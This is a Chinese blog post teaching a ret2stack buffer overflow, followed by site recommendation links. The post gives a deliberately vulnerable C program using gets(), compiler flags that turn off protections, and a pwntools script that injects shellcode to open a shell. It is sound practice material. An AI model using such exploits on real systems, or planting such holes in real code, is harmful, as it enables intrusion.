ret2stack

最新推荐文章于 2024-04-27 14:40:28 发布
最新推荐文章于 2024-04-27 14:40:28 发布
阅读量249 收藏 2
点赞数 1
文章标签: gdb 安全漏洞 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41560595/article/details/109250106
版权 
#include<stdio.h>
int main(){
 setbuf(stdin,0);
 setbuf(stdout,0);
 char str[100];
 printf("%p",&str);
 gets(str);
 return 0;
}

== setbuf(stdin,0)和setbuf(stdout)是关闭缓冲区,否则缓冲区会一直等到满了才会传送数据==

在这里插入图片描述

查看权限

在这里插入图片描述
gcc -fno-stack-protector -z execstack -no-pie -o debug debug.c

思路

由于NX关闭,所以可以构造shellcode
因为只有一个数组变量,栈顶开始的地方就是数组开始的地方,从栈顶开始填充shellcode,一直覆盖到rbp。最后追加数组地址,执行shellcode。

from pwn import *
context.arch="amd64"
shellcode=asm(shellcraft.amd64.sh())
p=process("./debug")
p.recv()

shellcode=shellcode.ljust(120,b"A")
buf=0x7fffffffdc80

payload=shellcode+p64(buf)

p.sendline(payload)
p.interactive()

用gdb计算buf的地址会有问题,用代码打印地址的方式最为保险。

「已注销」
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF 中setbuf利用笔记
小强的博客
06-12 1249
主要参考https://paper.seebug.org/450/ (CTF PWN 题之 setbuf 的利用) 这篇文章,写的比较随意,就是整理一下思路:首先看漏洞点v3是用户输入的,可以控制,而且基本上没有限制,只要输入小于等于2就行,再看off_804B048处:程序的本意是想让我们调用no xor re这三四个函数,但是由于没有限制输入的数据,导致可以输入负数调用上边的setbuf ...
stack_overflow_ret
09-23
软件漏洞分析入门 中的文件 stack_overflow_ret
[第六章 CTF之PWN章]n1ker
yongbaoii的博客
04-18 541
printf(&x)的利用——CGfsb题解
Little_Small_Joze的博客
03-11 326
例行检测 file CGfsb checksec CGfsb 反编译 int __cdecl main(int argc, const char **argv, const char **envp) { _DWORD buf[2]; // [esp+1Eh] [ebp-7Eh] BYREF __int16 v5; // [esp+26h] [ebp-76h] char s[100]; // [esp+28h] [ebp-74h] BYREF unsigned int v7; // [e
栈溢出进阶 小白笔记
小白垃圾笔记2
04-05 660
具有canary保护的程序在canary检查不同时,回报错,然后打印出文件名,文件名好像是在运行的时候保存进去的。当canary被改后程序会调用 _stack_chk_fail@plt然后调用__fortify__fail源代码__stack_chk_fail函数,它会调用__fortify_fail函数,__fortify_fail函数有一个参数,这个参数就是我们程序崩溃的时候打印出来的数据。下边是__fortify_fail 函数的源代码。
汇编语言——转移指令的ret和cal (基于8086CPU)
qq_42370809的博客
06-24 885
小甲鱼汇编9
对于setbuf函数的解释
BeTalker的专栏
11-28 1748
原文网址:http://bytes.com/topic/c/answers/222619-setbuf-stdin-null-cant-work-why 其中只摘取其中有价值的部分: Question: hi, everyone. now, I'am confused on such a problem: function setbuf(stdin, NULL) or
关于 stdin 和stdout 还有 setbuf
一介码农,热爱金融。
06-03 1387
#include int main() { char buf[BUFSIZ]; // setbuf(stdin, buf);跟下面的执行时一个结果 说明标准的缓冲区只有一个但是有两种方式去访问 一种是输入 一种是输出、 setbuf(stdout,buf); printf("Hello, world!\n"); return 0; }
setbuf()关闭缓冲
热门推荐
后台开发
11-08 1万+
setbuf函数用于打开和关闭缓冲机制,今天看看关闭缓冲区的功能。昨天在网上看到一个小程序,printf打印不出数据来,我们来看看。 #include int main(void) { int i=0; for(i=0;i<10;i++) { printf("haha"); sleep(1); } return
DSP实验报告(2).doc
03-09
RET .end 六、实验结果 实验二 加减法和乘法运算 一、实验目的 掌握加减法和乘法运算指令。 二、实验设备 计算机 三、实验内容 编写程序,分别实现计算z=x+y-w、y=mx+b、y=。 四、实验结果 1 y=mx+b 源程序如下: ....
电子发声设计实验(2).doc
02-27
延时子程序 D0: MOV CX,0010H D1: MOV AX,0FF0H D2: DEC AX JNZ D2 LOOP D1 DEC DL JNZ D0 RET DALLY ENDP CODE ENDS END START 1.4.2第二个程序 【实验内容】 按下键盘上的数字键1—7,使得扬声器发出音乐乐谱的1-7...
tiny-tcp-ip-stack:小型的tcpip协议栈,主控芯片为stm32f407
05-22
tiny-tcp-ip-stack 小型的tcp/ip协议栈,主控芯片为stm32f401RET6
basic-stacklang-interpreter:用于 APT 讲座的基于堆栈的基本解释器
06-25
口译员 用于 APT 讲座的基于堆栈的基本解释器。 使用一个堆栈和一个从0开始的程序... RET 弹出顶部元素,跳转到它 行前也可以有标签,格式为LABEL: INSTRUCTION (注意冒号和指令之间的空格) 示例文件 INT 100 L
7.Linux常用命令---系统管理
大眼`不聚光
04-25 780
我们知道,在fork()建立新进程之后,父进程与子进程共享代码段,但数据空间是分开的,但父进程会把自己数据空间的内容copy到子进程中去,还有上下文也会copy到子进程中去。而为了提高效率,采用一种写时copy的策略,即创建子进程的时候,并不copy父进程的地址空间,父子进程拥有共同的地址空间,只有当子进程需要写入数据时(如向缓冲区写入数据),这时候会复制地址空间,复制缓冲区到子进程中去。从中可以知道,source命令是在当前进程中执行参数文件中的各个命令,而不是另起子进程(或sub-shell)。
shell脚本一键安装nginx-1.18.0
misakivv的博客
04-23 275
shell脚本一键安装nginx-1.18.0
Android 14 transtion 动画流程
u012627628的博客
04-24 926
implements Transitions.TransitionHandler 的对象都会调用到startAnimation。根据上步计算出来的sortedTargets计算要做的动画TransitionInfo。此列表在开始做动画时候会判断里面的key,value是否满足做动画的条件。将符合条件的changeInfo添加到targets 返回。计算所有的到mChanges。
ssh -t 命令使用
sinat_34241861的博客
04-26 197
允许你在远程机器上执行需要交互式终端的操作。当你通过SSH连接到远程机器时,默认情况下,远程命令会在非交互式模式下运行,这意味着它不会像在本地终端中那样接收和处理键盘输入。,可以在远程机器上使用命令进行交互。这在运行需要交互式输入的命令时非常有用,例如编辑器、shell脚本或需要用户输入的程序。命令用SSH协议安全地连接到远程计算机,并允许你分配一个伪终端。示例:查看远程机器下某个文件并可以对文件进行操作。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 721
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Linux 环境变量的增删改
最新发布
夏沫的杂物间
04-27 423
本文章旨在总结备份、方便以后查询,由于是个人总结,如有不对,欢迎指正;另外,内容大部分来自网络、书籍、和各类手册,如若侵权请告知,马上删帖致歉。
为以下代码添加详细的注释:data segment hua db 'input yuanxin and banjing(example:200,200 100): $' zifu db 20 dup(0) shu db 20 dup(0) suan db 24 dup(0) data ends stack segment stk db 16 dup(0) stack ends code segment assume cs:code, ds:data, ss:stack start: mov ax,data mov ds,ax mov ax,stack mov ss,ax mov dx,offset hua call showmsg call input call zhuanshu call moshi mov bx,offset shu mov ax,ds:[bx] mov si,ax mov ax,ds:[bx+2] mov di,ax call drawyuan jmp start input: mov bx,0 mov cx,20 re: mov ah,1h int 21h cmp al,0dh ; 0dh jz scx mov si,offset zifu mov [bx][si],al inc bx loop re ret scx: mov cx,0 ret showmsg: mov ah,9h int 21h ret moshi: mov al,12h mov ah,0 int 10h ret zhuanshu: mov bx,offset zifu mov bp,offset shu mov cx,16 mov si,0 mov di,0
06-09
; 定义数据段 data segment hua db 'input yuanxin and banjing(example:200,200 100): $' ; 定义字符串常量 "input yuanxin and banjing(example:200,200 100): " zifu db 20 dup(0) ; 定义长度为 20 的字符数组 zifu shu db 20 dup(0) ; 定义长度为 20 的字符数组 shu suan db 24 dup(0) ; 定义长度为 24 的字符数组 suan data ends ; 定义栈段 stack segment stk db 16 dup(0) ; 定义长度为 16 的栈空间 stack ends ; 定义代码段 code segment assume cs:code, ds:data, ss:stack ; 定义代码段、数据段和栈段的关联关系 start: mov ax,data ; 将数据段的起始地址赋值给寄存器 AX mov ds,ax ; 将数据段的起始地址赋值给数据段寄存器 DS mov ax,stack ; 将栈段的起始地址赋值给寄存器 AX mov ss,ax ; 将栈段的起始地址赋值给栈段寄存器 SS mov dx,offset hua ; 将 hua 字符串的偏移地址赋值给寄存器 DX call showmsg ; 调用 showmsg 子程序 call input ; 调用 input 子程序 call zhuanshu ; 调用 zhuanshu 子程序 call moshi ; 调用 moshi 子程序 mov bx,offset shu ; 将 shu 数组的偏移地址赋值给寄存器 BX mov ax,ds:[bx] ; 将 shu 数组的前两个字节的值赋值给寄存器 AX mov si,ax ; 将 AX 的值赋值给寄存器 SI mov ax,ds:[bx+2] ; 将 shu 数组的第三、四个字节的值赋值给寄存器 AX mov di,ax ; 将 AX 的值赋值给寄存器 DI call drawyuan ; 调用 drawyuan 子程序 jmp start ; 无条件跳转到 start 标签处 input: mov bx,0 ; 将 BX 寄存器清零 mov cx,20 ; 将 CX 寄存器赋值为 20 re: mov ah,1h ; 设置 AH 寄存器为 1h int 21h ; 调用 DOS 中断 21h 的功能,等待用户输入字符 cmp al,0dh ; 将 AL 寄存器的值与 0dh 进行比较 jz scx ; 如果相等,跳转到 scx 标签处 mov si,offset zifu ; 将 zifu 数组的偏移地址赋值给寄存器 SI mov [bx][si],al ; 将用户输入的字符保存到 zifu 数组中 inc bx ; 将 BX 寄存器的值加 1 loop re ; 循环执行 re 标签处的指令 ret ; 返回 scx: mov cx,0 ; 将 CX 寄存器的值清零 ret ; 返回 showmsg: mov ah,9h ; 设置 AH 寄存器为 9h int 21h ; 调用 DOS 中断 21h 的功能,显示字符串 ret ; 返回 moshi: mov al,12h ; 将 AL 寄存器的值赋值为 12h mov ah,0 ; 将 AH 寄存器的值清零 int 10h ; 调用 BIOS 中断 10h 的功能,设置显示模式 ret ; 返回 zhuanshu: mov bx,offset zifu ; 将 zifu 数组的偏移地址赋值给寄存器 BX mov bp,offset shu ; 将 shu 数组的偏移地址赋值给寄存器 BP mov cx,16 ; 将 CX 寄存器赋值为 16 mov si,0 ; 将 SI 寄存器的值清零 mov di,0 ; 将 DI 寄存器的值清零

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值